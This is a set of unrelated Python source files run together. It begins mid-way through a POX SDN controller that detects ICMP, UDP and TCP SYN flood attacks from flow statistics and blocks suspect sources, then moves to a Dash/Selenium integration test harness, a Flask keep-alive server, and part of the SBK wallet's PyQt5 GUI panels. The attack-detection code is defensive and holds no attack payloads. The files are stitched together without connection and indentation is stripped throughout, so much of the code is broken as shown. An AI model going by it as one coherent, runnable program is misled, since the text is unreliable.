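#   df = pd.Series([50., 50.], index=['10.0.0.1', '10.0.0.2'])
#   calculate_Entropy(df) == 1.0, since two equally active sources give
#   -(0.5*log2(0.5) + 0.5*log2(0.5)) = 1 bit; traffic dominated by one source tends towards 0.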
# Using this function to detect UDP attack
def normalize(vector):
for i in vector.index:
vector[i] = (vector[i] - min_feature[i])/(max_feature[i] - min_feature[i])
# Using this function to detect ICMP attack
def normalize_icmp(vector):
for i in vector.index:
vector[i] = (vector[i] - min_feature_icmp[i])/ (max_feature_icmp[i] - min_feature_icmp[i])
# Normalize feature in anomaly detection - Using algorithm: Local outlier factor
def normalize_minmax(vector):
for i in vector.index:
vector[i] = (vector[i] - std[i])/ (mean[i] - std[i])
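# Note: in launch() `mean` and `std` are loaded from the maxFeature/minFeature pickles,
# so normalize_minmax() effectively performs min-max scaling: (x - min) / (max - min).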
# handler to display flow statistics received in JSON format
# structure of event.stats is defined by ofp_flow_stats()
def _handle_flowstats_received (event):
stats = flow_stats_to_list(event.stats)
log.debug("FlowStatsReceived from %s: %s",
dpidToStr(event.connection.dpid), stats)
global cnt, df1, df2, arr1, arr2, change_mode, tcp_activation
if event.connection.dpid:
if change_mode==mod.MODE_NORMAL or \
change_mode==mod.MODE_CLASSIFIER or \
change_mode==mod.MODE_DETECT_ICMP or \
change_mode==mod.MODE_DETECT_UDP:
status(event)
elif change_mode==mod.MODE_DETECT_TCPSYN:
print "detect TCP SYN attack using KNN"
tcp_activation = 1
def status(event):
global cnt, arr1, arr2, df1, df2, change_mode
print "dpid=", event.connection.dpid
# print stats
print "************************************************"
n1 = t.time() ###########################n1#####################
flowtable = []
for f in event.stats:
flowtable.append([f.packet_count,
str(f.match.nw_src),
str(f.match.nw_dst),
str(f.match.tp_src),
str(f.match.tp_dst),
f.match.nw_proto])
lenFlow = len(flowtable)
n2 = t.time() ###########################n2-n1 = getflow#####################
print "n2-n1=", n2 - n1
if (lenFlow != 0) and (cnt < 1):
        print 'cnt=', cnt
cnt = cnt + 1
arr1 = np.array(flowtable)
df1 = pd.DataFrame(arr1, columns=['total_pkt',
'ip_src',
'ip_dst',
'port_src',
'port_dst',
'proto'])
df1['total_pkt'] = df1['total_pkt'].astype(np.float)
elif (lenFlow != 0) and (cnt >= 1):
n3 = t.time() ######################################################### n3 ########
        print 'cnt=', cnt
cnt = cnt + 1
arr2 = np.array(flowtable)
df2 = pd.DataFrame(arr2, columns=['total_pkt',
'ip_src',
'ip_dst',
'port_src',
'port_dst',
'proto'])
new_flows = pd.DataFrame(columns=['ip_src', 'total_pkt'])
df2['total_pkt'] = df2['total_pkt'].astype(np.float)
########### add diff IP_src,IP_dst
################ v.2 #######################
df1.set_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
df2.set_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
s = df2.loc[df2.index.difference(df1.index), :]
s.reset_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
# s.drop(['ip_dst', 'port_src', 'port_dst', 'proto'], axis=1, inplace=True)
new_flows = new_flows.append(s)
# total packet new > total packet old => new flow => add
common = df2.index.intersection(df1.index)
s = df2.loc[common]
s1 = s - df1.loc[common]
s2 = s1[s1['total_pkt'] > 0]
s2.reset_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
# s2.drop(['ip_dst', 'port_src', 'port_dst', 'proto'], axis=1, inplace=True)
        new_flows = new_flows.append(s2)
# total packet new < total packet old => new flow => add
s = s[s1['total_pkt'] < 0]
s.reset_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
# s.drop(['ip_dst', 'port_src', 'port_dst', 'proto'], axis=1, inplace=True)
new_flows = new_flows.append(s)
# print "hung", new_flows
df1.reset_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
df2.reset_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
print "NUMBER OF NEW FLOWS = ", len(new_flows)
ent_ip_src = calculate_Entropy(new_flows.groupby(['ip_src'])['total_pkt'].sum())
total_packets = new_flows['total_pkt'].sum()
# print "Hung", new_flows
# Mode normal - processing with local outlier factor
if change_mode == mod.MODE_NORMAL:
feature_vector = pd.Series([ent_ip_src, total_packets], index=['ent_ip_src', 'total_packets'])
print "Feature list \n ", feature_vector
normalize_minmax(feature_vector)
# print "Feature list \n ", feature_vector
tobe_classifed = feature_vector.values
change_mode = lof_alg.lof1.predict(tobe_classifed)[0]
if change_mode == 0:
print "Network is safe"
# mode classifier
if change_mode==mod.MODE_CLASSIFIER:
print "Dangerous!!!!\nDangerous!!!!\nChange controller to mode classification"
new_flows['proto'] = new_flows['proto'].astype(np.float)
classifier = new_flows.groupby('proto')['total_pkt'].sum()
classifier = classifier.loc[[1, 17, 6]]
if classifier.loc[1] > mod.THRESHOLD_ICMP:
change_mode = mod.MODE_DETECT_ICMP
print "Suspect ICMP attack - change controller to mode detect ICMP attack"
elif classifier.loc[17] > mod.THRESHOLD_UDP:
change_mode = mod.MODE_DETECT_UDP
print "Suspect UDP attack - change controller to mode detect UDP attack"
elif classifier.loc[6] > mod.THRESHOLD_TCP_SYN:
change_mode = mod.MODE_DETECT_TCPSYN
print "Suspect TCP SYN attack - change controller to mode detect TCP SYN attack"
else:
change_mode = mod.MODE_NORMAL
print "Not detect attack - change controller to mode normal"
# mode detect udp attack
elif change_mode==mod.MODE_DETECT_UDP:
print "detect UDP attack using KNN"
ent_tp_src = calculate_Entropy(new_flows.groupby(['port_src'])['total_pkt'].sum())
ent_tp_dst = calculate_Entropy(new_flows.groupby(['port_dst'])['total_pkt'].sum())
ent_packet_type = calculate_Entropy(new_flows.groupby(['proto'])['total_pkt'].sum())
feature_vector = pd.Series([ent_ip_src, ent_tp_src, ent_tp_dst, ent_packet_type, total_packets],
index=['ent_ip_src',
'ent_tp_src',
'ent_tp_dst',
'ent_packet_type',
'total_packets'])
print "Feature list \n ", feature_vector
normalize(feature_vector)
tobeClassifed = feature_vector.values
change_mode = knn.calculate(tobeClassifed)
if change_mode == 1:
change_mode += 2
print " UDP Attack!!!\n UDP Attack!!!\n UDP Attack!!!"
else:
print "Relax... It's a mistake"
# detect ICMP attack using deep learning
elif change_mode==mod.MODE_DETECT_ICMP:
print "Detect ICMP attack using deep learning"
ent_tp_src = calculate_Entropy(new_flows.groupby(['port_src'])['total_pkt'].sum())
ent_tp_dst = calculate_Entropy(new_flows.groupby(['port_dst'])['total_pkt'].sum())
ent_packet_type = calculate_Entropy(new_flows.groupby(['proto'])['total_pkt'].sum())
feature_vector = pd.Series([ent_ip_src, ent_tp_src, ent_tp_dst, ent_packet_type, total_packets],
index=['ent_ip_src',
'ent_tp_src',
'ent_tp_dst',
'ent_packet_type',
'total_packets'])
print "Feature list \n ", feature_vector
normalize_icmp(feature_vector)
tobeClassifed = np.reshape(feature_vector.values, (-1,1))
change_mode = Backprop.predict_realtime(tobeClassifed, parameters)
if change_mode == 1:
change_mode += 1
msg = of.ofp_flow_mod()
msg.priority = mod.PRIORITY
msg.match.dl_type = 0x800
msg.match.nw_proto = 1
for connection in core.openflow.connections:
connection.send(msg)
print " ICMP Attack!!!\n ICMP Attack!!!\n ICMP Attack!!!"
else:
print "Relax... it's a mistake"
# print "df1: ", df1
# print "df2: ", df2
df1 = df2.copy()
n12 = t.time() ################ n12-n1 = total time ##############
req2rep = n12 - n1
print('From Request to Reply =', req2rep)
def _tcp_status(event):
global packets, ip, count, change_mode
if tcp_activation:
global packets, start
table = []
packet = event.parsed
# tcp = packet.find('tcp')
if packet.find('tcp') and packet.find('tcp').SYN and packet.find('tcp').ACK == False:
table.append([of.ofp_match.from_packet(packet).tp_src,
# of.ofp_match.from_packet(packet).tp_dst,
of.ofp_match.from_packet(packet).nw_src,
# of.ofp_match.from_packet(packet).nw_dst
])
if len(packets) == 0:
packets = pd.DataFrame(table,
columns=['source_port','IP_source'])
else:
new_packets = pd.DataFrame(table,
columns=['source_port', 'IP_source',])
packets = packets.append(new_packets, ignore_index=True)
ip = pd.read_csv('test.csv')
# ip_update = ip['IP_source'].as_matrix()
# if str(of.ofp_match.from_packet(packet).nw_src) in ip_update:
# packet_out = of.ofp_packet_out()
# # flow_mod = of.ofp_flow_mod()
# packet_out.buffer_id = event.ofp.buffer_id
# packet_out.match = of.ofp_match.from_packet(packet)
# # packet_out.data = event.data
# # packet_out.in_port = event.port
# event.connection.send(packet_out)
# elif count > 2:
# change_mode = 0
        if t.time() - start >= 5:  # process the accumulated SYN packets roughly every 5 seconds (same cadence as the stats timer)
count += 1
# print len(ip)
start = t.time()
thread1 = threading.Thread(target=processing_statistic, args=(packets,))
thread1.start()
packets = pd.DataFrame([])
def processing_statistic(pk):
global statistic, change_mode, tcp_activation, count
global ip
if len(pk) != 0:
statistic = pk
# print(statistic)
statistic['destination_port'] = 1
new_statistic = statistic.groupby(['IP_source', 'source_port']).count()
new_statistic_2 = statistic.drop(['source_port'], axis=1).groupby(['IP_source']).count()
# print new_statistic_2
new_statistic = new_statistic/new_statistic_2
new_statistic = -new_statistic*np.log2(new_statistic)
new_statistic = new_statistic.groupby(['IP_source']).sum()
# #### using algorithm
# # print new_statistic
# tobeClassifier = new_statistic.as_matrix()
# # print tobeClassifier.shape
# labels = tcp_syn.calculate_batch(tobeClassifier)
# labels = np.array(labels)
# print labels
# change_mode = np.max(labels)*4
#### Not using algorithm
new_statistic = new_statistic.iloc[new_statistic['destination_port'].as_matrix() > 5, :]
change_mode = int(len(new_statistic) != 0)*4
print "change_mode=", change_mode
if change_mode == mod.MODE_NORMAL and count > 2:
tcp_activation = 0
count = 0
else:
print "TCP-SYN attack!!!\nTCP-SYN attack!!!\nTCP-SYN attack!!!"
# new_statistic = new_statistic.iloc[labels == 1, :]
# count = 0
if len(ip) != 0 and len(new_statistic) != 0:
# ip.set_index('IP_source', inplace=True)
# new_statistic['IP_source'] = new_statistic['IP_source'].astype(str)
new_statistic.index = new_statistic.index.astype(str)
new_statistic = new_statistic.loc[new_statistic.index.difference(ip.index), ]
for ip_src in new_statistic.index:
msg = of.ofp_flow_mod()
msg.priority = mod.PRIORITY
msg.match.dl_type = 0x800
msg.match.nw_src = IPAddr(ip_src)
for connection in core.openflow.connections:
connection.send(msg)
with open('test.csv', 'a') as f:
new_statistic.to_csv(f, encoding='utf-8', header=False)
print "=================================================="
# main functiont to launch the module
def launch ():
from pox.lib.recoco import Timer
global start, cnt, mean, std, max_feature, min_feature, max_feature_icmp, min_feature_icmp
global change_mode, tcp_activation
tcp_activation = 0
change_mode = 0
cnt=0
start = t.time()
# mean = pd.read_pickle("./somInput/meanStats")
# std = pd.read_pickle("./somInput/stdStats")
mean = pd.read_pickle("./somInput/maxFeature")
std = pd.read_pickle("./somInput/minFeature")
max_feature = pd.read_pickle("./somInput/max_feature.pickle")
min_feature = pd.read_pickle("./somInput/min_pickle.pickle")
max_feature_icmp = pd.read_pickle("./somInput/max_feature_icmp")
min_feature_icmp = pd.read_pickle("./somInput/min_feature_icmp")
print 'start=', start
    # attach handlers to listeners
core.openflow.addListenerByName("FlowStatsReceived",
_handle_flowstats_received)
core.openflow.addListenerByName("PacketIn",
_tcp_status)
# timer set to execute every five seconds
Timer(5, _timer_func, recurring=True)
|
IntegrationTests.py
|
from __future__ import absolute_import
import logging
import os
import multiprocessing
import sys
import time
import unittest
import percy
import threading
import platform
import flask
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
class IntegrationTests(unittest.TestCase):
def percy_snapshot(self, name=''):
if os.environ.get('PERCY_ENABLED', False):
snapshot_name = '{} - {}'.format(name, sys.version_info)
self.percy_runner.snapshot(
name=snapshot_name
)
@classmethod
def setUpClass(cls):
super(IntegrationTests, cls).setUpClass()
options = Options()
if 'DASH_TEST_CHROMEPATH' in os.environ:
options.binary_location = os.environ['DASH_TEST_CHROMEPATH']
cls.driver = webdriver.Chrome(chrome_options=options)
if os.environ.get('PERCY_ENABLED', False):
loader = percy.ResourceLoader(
webdriver=cls.driver
)
cls.percy_runner = percy.Runner(loader=loader)
cls.percy_runner.initialize_build()
@classmethod
def tearDownClass(cls):
super(IntegrationTests, cls).tearDownClass()
cls.driver.quit()
if os.environ.get('PERCY_ENABLED', False):
cls.percy_runner.finalize_build()
def setUp(self):
pass
def tearDown(self):
time.sleep(3)
if platform.system() == 'Windows':
requests.get('http://localhost:8050/stop')
else:
self.server_process.terminate()
time.sleep(3)
def startServer(self, app):
if 'DASH_TEST_PROCESSES' in os.environ:
processes = int(os.environ['DASH_TEST_PROCESSES'])
else:
processes = 4
def run():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
app.run_server(
port=8050,
debug=False,
processes=processes
)
def run_windows():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
@app.server.route('/stop')
def _stop_server_windows():
stopper = flask.request.environ['werkzeug.server.shutdown']
stopper()
return 'stop'
app.run_server(
port=8050,
debug=False,
threaded=True
)
        # Run on a separate process (or a thread on Windows) so that it doesn't block
system = platform.system()
if system == 'Windows':
self.server_thread = threading.Thread(target=run_windows)
self.server_thread.start()
else:
self.server_process = multiprocessing.Process(target=run)
self.server_process.start()
logging.getLogger('werkzeug').setLevel(logging.ERROR)
time.sleep(5)
# Visit the dash page
self.driver.get('http://localhost:8050')
time.sleep(0.5)
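# Illustrative sketch: a hypothetical subclass showing the intended
# startServer() + percy_snapshot() pattern. The dash / dash_html_components
# imports and the layout below are assumptions, so the example is left
# commented out rather than added to the test suite.
#
#     import dash
#     import dash_html_components as html
#
#     class RenderTests(IntegrationTests):
#         def test_simple_render(self):
#             app = dash.Dash(__name__)
#             app.layout = html.Div('Hello Dash')
#             self.startServer(app)
#             self.percy_snapshot(name='simple-render')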
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am alive!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
gui_panels.py
|
#!/usr/bin/env python3
# This file is part of the SBK project
# https://github.com/mbarkhau/sbk
#
# Copyright (c) 2019-2021 Manuel Barkhau (mbarkhau@gmail.com) - MIT License
# SPDX-License-Identifier: MIT
# messy ui code is messy ...
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-return-statements
"""GUI Panels for SBK."""
import os
import time
import logging
import pathlib as pl
import tempfile
import threading
import subprocess as sp
from typing import Any
from typing import Set
from typing import Dict
from typing import List
from typing import Type
from typing import Tuple
from typing import Union
from typing import Generic
from typing import NewType
from typing import TypeVar
from typing import Callable
from typing import Iterable
from typing import Iterator
from typing import Optional
from typing import Protocol
from typing import Sequence
from typing import Generator
from typing import NamedTuple
import PyQt5.QtGui as qtg
import PyQt5.QtCore as qtc
import PyQt5.QtWidgets as qtw
from . import __version__
from . import shamir
from . import gui_tasks as gt
from . import ui_common
from . import parameters
from . import common_types as ct
from . import package_data
from . import gui_panels_base as gpb
logger = logging.getLogger("sbk.gui_panels")
GUIDE_TEXT = f"""
<html><head/><body style="white-space:pre-wrap;">
<p style="font-family:monospace;font-size:12px;line-height:92%;">
{ui_common.USER_GUIDE_QR_CODE}<p>
<center>{ui_common.USER_GUIDE_TEXT.strip()}</center>
</body></html>
"""
WARNING_TEXT = f"""
<html><head/><body style="white-space:pre-wrap;">
<p>
{ui_common.SECURITY_WARNING_TEXT.strip()}
</p>
<p style="font-family:monospace;line-height:100%;">
{ui_common.SECURITY_WARNING_QR_CODE}
<p>
</body></html>
"""
class SelectCommandPanel(gpb.Panel):
buttons: Dict[str, qtw.QPushButton]
def __init__(self, index: int):
self.title = "SBK"
super().__init__(index)
self._layout = qtw.QVBoxLayout()
pixmap = qtg.QPixmap()
pixmap.loadFromData(package_data.read_binary("nostroke_logo_64.png"))
icon_label = qtw.QLabel(self)
icon_label.setPixmap(pixmap.scaledToWidth(64))
icon_label.setAlignment(qtc.Qt.AlignCenter)
self._layout.addStretch(1)
self._layout.addWidget(icon_label)
self._layout.addStretch(1)
self.buttons = {}
def add_button(label: str, button_id: str, *, enabled: bool = True) -> qtw.QPushButton:
button = qtw.QPushButton(label)
button.clicked.connect(self.init_button_handler(button_id))
button.setEnabled(enabled)
self.buttons[button_id] = button
self._layout.addWidget(button)
return button
add_button("&Create Wallet" , 'generate').setDefault(True)
add_button("&Open Wallet" , 'open')
add_button("&Recover from Shares", 'recover')
self._layout.addStretch(1)
# add_button("&Load Salt and Brainkey", 'load')
# add_button("Derive &GPG Keypair", 'derive_gpg', enabled=False)
# add_button("Derive Password", 'derive_password', enabled=False)
# self._layout.addStretch(1)
add_button("&Settings" , 'settings')
add_button("&User Guide", 'userguide')
# self._layout.addStretch(1)
# add_button("&Debug", 'debug', enabled=False)
self._layout.addStretch(2)
version_text = f"""
<p style="font-family:monospace;font-size:10px;">
version: {__version__}
</a>
"""
version_label = qtw.QLabel(version_text)
version_label.setAlignment(qtc.Qt.AlignRight)
self._layout.addStretch(1)
self._layout.addWidget(version_label)
self.setLayout(self._layout)
def switch(self) -> None:
state = gpb.get_state()
self.trace("switch " + str((state['salt'], state['brainkey'], state['params'])))
state['panel_index'] = 0
# if state['salt'] and state['brainkey'] and state['params']:
# self.buttons['derive_gpg'].setEnabled(True)
# self.buttons['derive_pw'].setEnabled(True)
# self.buttons['show'].setEnabled(True)
# else:
# self.buttons['derive_gpg'].setEnabled(False)
# self.buttons['derive_pw'].setEnabled(False)
# self.buttons['show'].setEnabled(False)
super().switch()
def init_button_handler(self, button_id: str) -> Callable:
def handler(*args, **kwargs):
self.trace(f"handle button {button_id=} {args} {kwargs}")
p = self.parent()
if button_id in ('generate', 'open', 'load', 'recover'):
state = gpb.get_state()
state['salt' ] = None
state['brainkey'] = None
state['shares' ] = []
# state['params' ] = None
if button_id == 'open':
p.get_or_init_panel(OpenWalletPanel).switch()
elif button_id == 'recover':
p.get_or_init_panel(RecoverKeysPanel).switch()
elif button_id == 'generate':
p.get_or_init_panel(SeedGenerationPanel).switch()
# elif button_id == 'load':
# p.get_or_init_panel(XLoadKeysPanel).switch()
# elif button_id == 'show':
# p.get_or_init_panel(ShowKeysPanel).switch()
elif button_id == 'settings':
p.get_or_init_panel(SettingsPanel).switch()
elif button_id == 'userguide':
p.get_or_init_panel(UserGuidePanel).switch()
# elif button_id == 'debug':
# params = parameters.bytes2params(b"\x11\x00\x00")
# state = gpb.get_state()
# state['params'] = params
# p.get_or_init_panel(ShowKeysPanel).switch()
else:
raise NotImplementedError()
return handler
class SettingsPanel(gpb.NavigablePanel):
def __init__(self, index: int):
self.title = "SBK - Settings"
self.back_panel_clazz = SelectCommandPanel
self.next_panel_clazz = SelectCommandPanel
super().__init__(index)
self.next_button.setText("&Save")
form = qtw.QFormLayout()
state = gpb.get_state()
self.offline = qtw.QCheckBox()
self.offline.setTristate(False)
form.addRow("&Offline", self.offline)
# NOTE (mb 2021-09-24): Reserve wallet name function to cli
# for now. It might be added to the gui later if we can
        # communicate the usage caveats to the user.
#
# self.wallet_name = qtw.QLineEdit()
# if state['wallet_name'] == ui_common.DEFAULT_WALLET_NAME:
# self.wallet_name.setPlaceholderText(ui_common.DEFAULT_WALLET_NAME)
# else:
# self.wallet_name.setText(state['wallet_name'])
# form.addRow("&Wallet Name", self.wallet_name)
self.sss_t = qtw.QSpinBox()
self.sss_t.setRange(parameters.MIN_THRESHOLD, parameters.MAX_THRESHOLD)
form.addRow("&Threshold", self.sss_t)
self.sss_n = qtw.QSpinBox()
self.sss_n.setRange(3, 63)
form.addRow("Shares", self.sss_n)
def constrain_threshold():
threshold = min(self.sss_n.value(), parameters.MAX_THRESHOLD)
self.sss_t.setMaximum(threshold)
def constrain_num_shares():
self.sss_n.setMinimum(self.sss_t.value())
self.sss_n.valueChanged.connect(constrain_threshold)
self.sss_t.valueChanged.connect(constrain_num_shares)
self.target_memory = qtw.QSpinBox()
self.target_memory.setRange(10, state['max_memory'])
self.target_memory.setSingleStep(10)
form.addRow("&Memory Usage [MB]", self.target_memory)
self.target_duration = qtw.QSpinBox()
self.target_duration.setRange(1, 600)
form.addRow("&Duration [Seconds]", self.target_duration)
self._layout = qtw.QVBoxLayout()
self._layout.addLayout(form)
self._layout.addStretch(1)
self._layout.addLayout(self.nav_layout)
self.setLayout(self._layout)
def switch(self) -> None:
super().switch()
state = gpb.get_state()
params = state['params']
assert params is not None
self.offline.setCheckState(qtc.Qt.Checked if state['offline'] else qtc.Qt.Unchecked)
self.sss_t.setValue(params.sss_t)
self.sss_n.setValue(params.sss_n)
self.target_memory.setValue(state['target_memory'])
self.target_duration.setValue(state['target_duration'])
def nav_handler(self, eventtype: str) -> Callable:
super_handler = super().nav_handler(eventtype)
def handler() -> None:
if eventtype == 'next':
state = gpb.shared_panel_state
state['offline'] = self.offline.checkState() == qtc.Qt.Checked
params = state['params']
assert params is not None
params = params._replace(sss_t=self.sss_t.value())
params = params._replace(sss_n=self.sss_n.value())
state['params'] = params
target_memory = self.target_memory.value()
state['target_memory' ] = target_memory
state['target_duration'] = self.target_duration.value()
super_handler()
return handler
class SeedGenerationPanel(gpb.Panel):
task1: Optional[gt.ParametersWorker]
task2: Optional[gt.SeedGenerationTask]
def __init__(self, index: int):
self.title = "Key Derivation ..."
super().__init__(index)
self._layout = qtw.QVBoxLayout()
label1 = qtw.QLabel("KDF Calibration")
label2 = qtw.QLabel("Key Derivation")
self.progressbar1 = qtw.QProgressBar()
self.progressbar1.setRange(0, 5000)
self.progressbar1.setValue(0)
self.progressbar2 = qtw.QProgressBar()
self.progressbar2.setRange(0, 90000)
self.progressbar2.setValue(0)
# Instantiated in switch(), because we want fresh parameters
# from previous panel every time.
self.task1 = None
self.task2 = None
self._layout.addWidget(label1)
self._layout.addWidget(self.progressbar1)
self._layout.addWidget(label2)
self._layout.addWidget(self.progressbar2)
self._layout.addStretch(1)
self.setLayout(self._layout)
def switch(self) -> None:
self.progressbar1.setValue(0)
self.progressbar2.setValue(0)
state = gpb.get_state()
params = state['params']
assert params is not None
self.task1 = gt.ParametersWorker(
state['target_memory'],
state['target_duration'],
params.sss_t,
params.sss_n,
)
self.task1.progress.connect(progressbar_updater(self.progressbar1))
self.task1.finished.connect(self.on_param_config_done)
super().switch()
self.task1.start()
def on_param_config_done(self, params: parameters.Parameters) -> None:
self.trace("on_param_config_done")
state = gpb.get_state()
state['params'] = params
self.task2 = gt.SeedGenerationTask(params)
self.task2.progress.connect(progressbar_updater(self.progressbar2))
self.task2.finished.connect(self.on_seed_generation_done)
self.task2.start()
def on_seed_generation_done(self, status: str) -> None:
if status == 'ok':
self.trace("on_seed_generation_done")
self.parent().get_or_init_panel(SecurityWarningPanel).switch()
else:
qtw.QMessageBox.critical(self, 'Error', status)
self.parent().close()
class UserGuidePanel(gpb.NavigablePanel):
def __init__(self, index: int):
self.title = "User Guide"
self.back_panel_clazz = SelectCommandPanel
self.next_panel_clazz = SelectCommandPanel
super().__init__(index)
label = qtw.QLabel(GUIDE_TEXT.strip())
label_wrap = qtw.QHBoxLayout()
label_wrap.addStretch(1)
label_wrap.addWidget(label)
label_wrap.addStretch(1)
self._layout = qtw.QVBoxLayout()
self._layout.addLayout(label_wrap)
self._layout.addStretch(2)
self._layout.addWidget(self.new_pdf_button("Share A4", "share_a4.pdf"))
self._layout.addWidget(self.new_pdf_button("Guide A4", "sbk_a4.pdf"))
self._layout.addWidget(self.new_pdf_button("Guide A4 Booklet", "sbk_booklet_letter.pdf"))
# self._layout.addWidget(self.new_pdf_button("Grid A4", "grid_a4.pdf"))
self._layout.addWidget(self.new_pdf_button("Share US Letter", "share_letter.pdf"))
self._layout.addWidget(self.new_pdf_button("Guide US Letter", "sbk_letter.pdf"))
self._layout.addWidget(self.new_pdf_button("Guide US Letter Booklet", "sbk_booklet_letter.pdf"))
# self._layout.addWidget(self.new_pdf_button("Grid US Letter", "grid_letter.pdf"))
self._layout.addStretch(1)
self._layout.addLayout(self.nav_layout)
self.setLayout(self._layout)
# self.next_button.setEnabled(False)
self.next_button.setVisible(False)
def new_pdf_button(self, label: str, pdf_name: str) -> qtw.QPushButton:
button = qtw.QPushButton(label)
button.clicked.connect(self.init_button_handler(pdf_name))
return button
def init_button_handler(self, pdf_name: str) -> Callable:
def launch():
pdf_data = package_data.read_binary(pdf_name)
tmp_path = tempfile.NamedTemporaryFile(suffix=".pdf", delete=False)
tmp_path.write(pdf_data)
tmp_path.close()
sp.run(["evince", tmp_path.name])
os.unlink(tmp_path.name)
def handler(*args, **kwargs):
launcher_thread = threading.Thread(target=launch, daemon=False)
launcher_thread.start()
return handler
class SecurityWarningPanel(gpb.NavigablePanel):
def __init__(self, index: int):
self.title = "Create New Wallet"
self.back_panel_clazz = SelectCommandPanel
self.next_panel_clazz = CreateKeysShowPanel
super().__init__(index)
label = qtw.QLabel(WARNING_TEXT.strip())
label_wrap = qtw.QHBoxLayout()
label_wrap.addStretch(1)
label_wrap.addWidget(label)
label_wrap.addStretch(1)
self._layout = qtw.QVBoxLayout()
self._layout.addLayout(label_wrap)
self._layout.addStretch(2)
self._layout.addLayout(self.nav_layout)
self.setLayout(self._layout)
def get_label_text() -> str:
secret_type, share_idx = gpb.get_secret_type()
if secret_type == 'share':
share_no = share_idx + 1
sss_n = len(gpb.shared_panel_state['shares'])
return f"Share {share_no}/{sss_n}"
elif secret_type == 'salt':
return "Salt"
elif secret_type == 'brainkey':
return "Brainkey"
else:
raise ValueError(f"Invalid secret_type={secret_type}")
class ShowKeysPanel(gpb.NavigablePanel):
def __init__(self, index: int):
self.title = "View Keys"
super().__init__(index)
self.header = gpb.header_widget()
self.text = qtw.QLabel()
self.grid_widgets: List[qtw.QWidget] = []
self.grid_layout = qtw.QGridLayout()
self._layout = qtw.QVBoxLayout()
self._layout.addWidget(self.header)
self._layout.addLayout(gpb.column_headers(self))
self._layout.addLayout(self.grid_layout)
self._layout.addStretch(1)
self._layout.addLayout(self.nav_layout)
self.setLayout(self._layout)
def get_current_secret(self) -> gpb.CurrentSecret:
return gpb.get_current_secret()
def switch(self) -> None:
self.trace(f"switch {type(self).__name__} {gpb.shared_panel_state['panel_index']}")
self.header.setText(get_label_text())
secret = self.get_current_secret()
intcodes = ui_common.bytes2intcodes(secret.secret_data)
mnemonics = ui_common.intcodes2mnemonics(intcodes)
num_rows = len(intcodes) // 2
assert num_rows * 2 == len(intcodes)
lr_intcodes = list(sum(zip(intcodes[:num_rows], intcodes[num_rows:]), ()))
_lr_intcodes = iter(lr_intcodes)
_mnemonics = iter(mnemonics)
all_row_widgets: gpb.RowWidgets = []
while True:
try:
row_widgets = (
gpb._label_widget(self, next(_lr_intcodes), bold=True),
gpb._label_widget(self, next(_mnemonics ), bold=True),
gpb._label_widget(self, next(_mnemonics ), bold=True),
gpb._label_widget(self, next(_lr_intcodes), bold=True),
)
all_row_widgets.append(row_widgets)
except StopIteration:
break
new_widgets = gpb.init_grid(self, self.grid_layout, all_row_widgets)
self.grid_widgets.extend(new_widgets)
super().switch()
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
self.trace(f"back show {state['panel_index']}")
if state['panel_index'] == 0:
return SelectCommandPanel
else:
state['panel_index'] -= 1
return ShowKeysPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
self.trace(f"next show {state['panel_index']}")
if state['panel_index'] + 1 < len(state['shares']) + 2:
state['panel_index'] += 1
return ShowKeysPanel
else:
return SelectCommandPanel
def destroy_panel(self) -> None:
for widget in self.grid_widgets:
self.grid_layout.removeWidget(widget)
widget.deleteLater()
del self.grid_widgets[:]
super().destroy_panel()
class CreateKeysShowPanel(ShowKeysPanel):
def __init__(self, index: int):
self.title = "Create New Wallet"
super().__init__(index)
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
self.trace(f"back show {gpb.shared_panel_state['panel_index']}")
if gpb.shared_panel_state['panel_index'] == 0:
return SecurityWarningPanel
else:
gpb.shared_panel_state['panel_index'] = max(gpb.shared_panel_state['panel_index'] - 1, 0)
return CreateKeysVerifyPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
self.trace(f"next show {gpb.shared_panel_state['panel_index']}")
return CreateKeysVerifyPanel
MaybeBytes = Union[bytes, None]
class CreateKeysVerifyPanel(gpb.EnterSecretPanel):
def __init__(self, index: int):
self.title = "Create New Wallet"
super().__init__(index)
def label_text(self) -> str:
return "Verify " + get_label_text()
def secret_len(self) -> int:
current_secret = gpb.get_current_secret()
return len(current_secret.secret_data)
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
return CreateKeysShowPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
num_shares = len(state['shares'])
num_secrets = num_shares + 2
if state['panel_index'] + 1 < num_secrets:
state['panel_index'] = max(state['panel_index'] + 1, 0)
return CreateKeysShowPanel
else:
return LoadWalletPanel
def is_final_panel(self) -> bool:
state = gpb.shared_panel_state
num_shares = len(state['shares'])
num_secrets = num_shares + 2
return state['panel_index'] + 1 >= num_secrets
class OpenWalletPanel(gpb.EnterSecretPanel):
def __init__(self, index: int):
self.title = "Load Wallet"
super().__init__(index)
def label_text(self) -> str:
if gpb.shared_panel_state['panel_index'] == 0:
return "Enter Salt"
else:
return "Enter Brainkey"
def secret_len(self) -> int:
lens = parameters.raw_secret_lens()
if gpb.shared_panel_state['panel_index'] == 0:
return lens.salt
else:
return lens.brainkey
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
if state['panel_index'] == 0:
return SelectCommandPanel
else:
state['panel_index'] = max(state['panel_index'] - 1, 0)
return OpenWalletPanel
@property
